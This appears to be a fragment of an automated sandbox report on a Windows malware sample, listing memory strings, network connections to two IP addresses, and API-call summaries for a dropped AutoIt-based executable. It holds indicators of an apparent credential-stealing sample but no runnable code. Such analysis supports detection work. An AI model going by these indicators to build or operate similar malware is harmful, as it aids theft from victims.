            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
            Source: Pizza.0.dr, Participating.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.deezer.com/
            Source: Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, DBAI5P.11.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Participating.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chrome.exe, 00000011.00000003.2030954255.00006C7800C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: content.js.23.dr, content_new.js.23.drString found in binary or memory: https://www.google.com/chrome
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: chrome.exe, 00000011.00000003.2058189996.00006C7802C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058164246.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
            Source: chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054216422.00006C7802CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054114288.00006C7802CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054171670.00006C7802CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
            Source: chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
            Source: chrome.exe, 00000011.00000003.2051212256.00006C7802660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
            Source: chrome.exe, 00000011.00000003.2058189996.00006C7802C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054615506.00006C780106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058164246.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054722108.00006C7802C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
            Source: chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054590983.00006C7802C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054216422.00006C7802CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054114288.00006C7802CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054171670.00006C7802CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.kK1dM3um3so.2019.O/rt=j/m=q_dnp
            Source: chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054590983.00006C7802C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054216422.00006C7802CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054114288.00006C7802CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054171670.00006C7802CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.iheart.com/podcast/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.instagram.com
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.last.fm/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.messenger.com
            Source: Participating.com, 0000000B.00000002.2655180675.0000000007146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
            Source: Participating.com, 0000000B.00000002.2655180675.0000000007146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
            Source: Participating.com, 0000000B.00000002.2655180675.0000000007146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Participating.com, 0000000B.00000002.2655180675.0000000007146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.office.com
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.tiktok.com/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://www.youtube.com
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://y.music.163.com/m/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
            Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.8:49805 version: TLS 1.2
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00D5F7C7
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00D5F55C
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D79FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00D79FD2
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D54763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_00D54763
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D41B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00D41B4D
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00D4F20D
            Source: C:\Users\user\Desktop\nB52P46OJD.exeFile created: C:\Windows\RankedImaginationJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_0040737E0_2_0040737E
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406EFE0_2_00406EFE
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_004079A20_2_004079A2
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_004049A80_2_004049A8
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D0801711_2_00D08017
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CEE1F011_2_00CEE1F0
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CFE14411_2_00CFE144
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CE22AD11_2_00CE22AD
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D022A211_2_00D022A2
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D1A26E11_2_00D1A26E
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CFC62411_2_00CFC624
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D6C8A411_2_00D6C8A4
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D1E87F11_2_00D1E87F
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D16ADE11_2_00D16ADE
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D52A0511_2_00D52A05
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D48BFF11_2_00D48BFF
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CFCD7A11_2_00CFCD7A
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D0CE1011_2_00D0CE10
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D1715911_2_00D17159
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CE924011_2_00CE9240
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D7531111_2_00D75311
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CE96E011_2_00CE96E0
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D0170411_2_00D01704
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D01A7611_2_00D01A76
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D07B8B11_2_00D07B8B
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CE9B6011_2_00CE9B60
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D07DBA11_2_00D07DBA
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D01D2011_2_00D01D20
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D01FE711_2_00D01FE7
